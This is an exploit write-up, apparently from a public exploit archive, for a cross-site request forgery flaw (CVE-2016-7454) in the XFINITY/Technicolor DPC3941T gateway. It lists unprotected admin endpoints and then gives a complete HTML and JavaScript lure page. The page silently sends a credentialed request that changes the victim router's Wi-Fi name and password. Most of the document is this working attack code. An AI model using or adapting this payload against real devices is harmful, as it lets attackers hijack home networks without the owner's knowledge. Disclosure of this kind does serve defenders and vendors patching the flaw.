43 lines
No EOL
1.4 KiB
HTML
43 lines
No EOL
1.4 KiB
HTML
# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T
|
|
# Date: 09/08/2016
|
|
# Exploit Author: Ayushman Dutta
|
|
# Version: dpc3941-P20-18-v303r20421733-160413a-CMCST
|
|
# CVE : CVE-2016-7454
|
|
|
|
The Device DPC3941T is vulnerable to CSRF and has no security on the entire
|
|
admin panel for it.
|
|
Some of the links are at:
|
|
|
|
<IP Address>/actionHandler/ajax_remote_management.php
|
|
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
|
|
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
|
|
<IP Address>/actionHandler/ajax_at_a_glance.php
|
|
|
|
A simple HTML page with javascript on which the attacker lures the victim
|
|
can be used to change state in the application.
|
|
|
|
<html>
|
|
<head>
|
|
<title>
|
|
Lets CSRF Xfinity to change Wifi Password
|
|
</title>
|
|
</head>
|
|
<script>
|
|
function jsonreq() {
|
|
var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
|
|
"network_name":"MyName", "wireless_mode":"a,n,ac",
|
|
"security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true",
|
|
"channel_number":"40", "network_password":"password",
|
|
"broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"});
|
|
var xmlhttp = new XMLHttpRequest();
|
|
xmlhttp.withCredentials = true;
|
|
xmlhttp.open("POST","
|
|
http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php",
|
|
true);
|
|
xmlhttp.setRequestHeader("Content-Type",
|
|
"application/x-www-form-urlencoded");
|
|
xmlhttp.send(json_upload);
|
|
}
|
|
jsonreq();
|
|
</script>
|
|
</html> |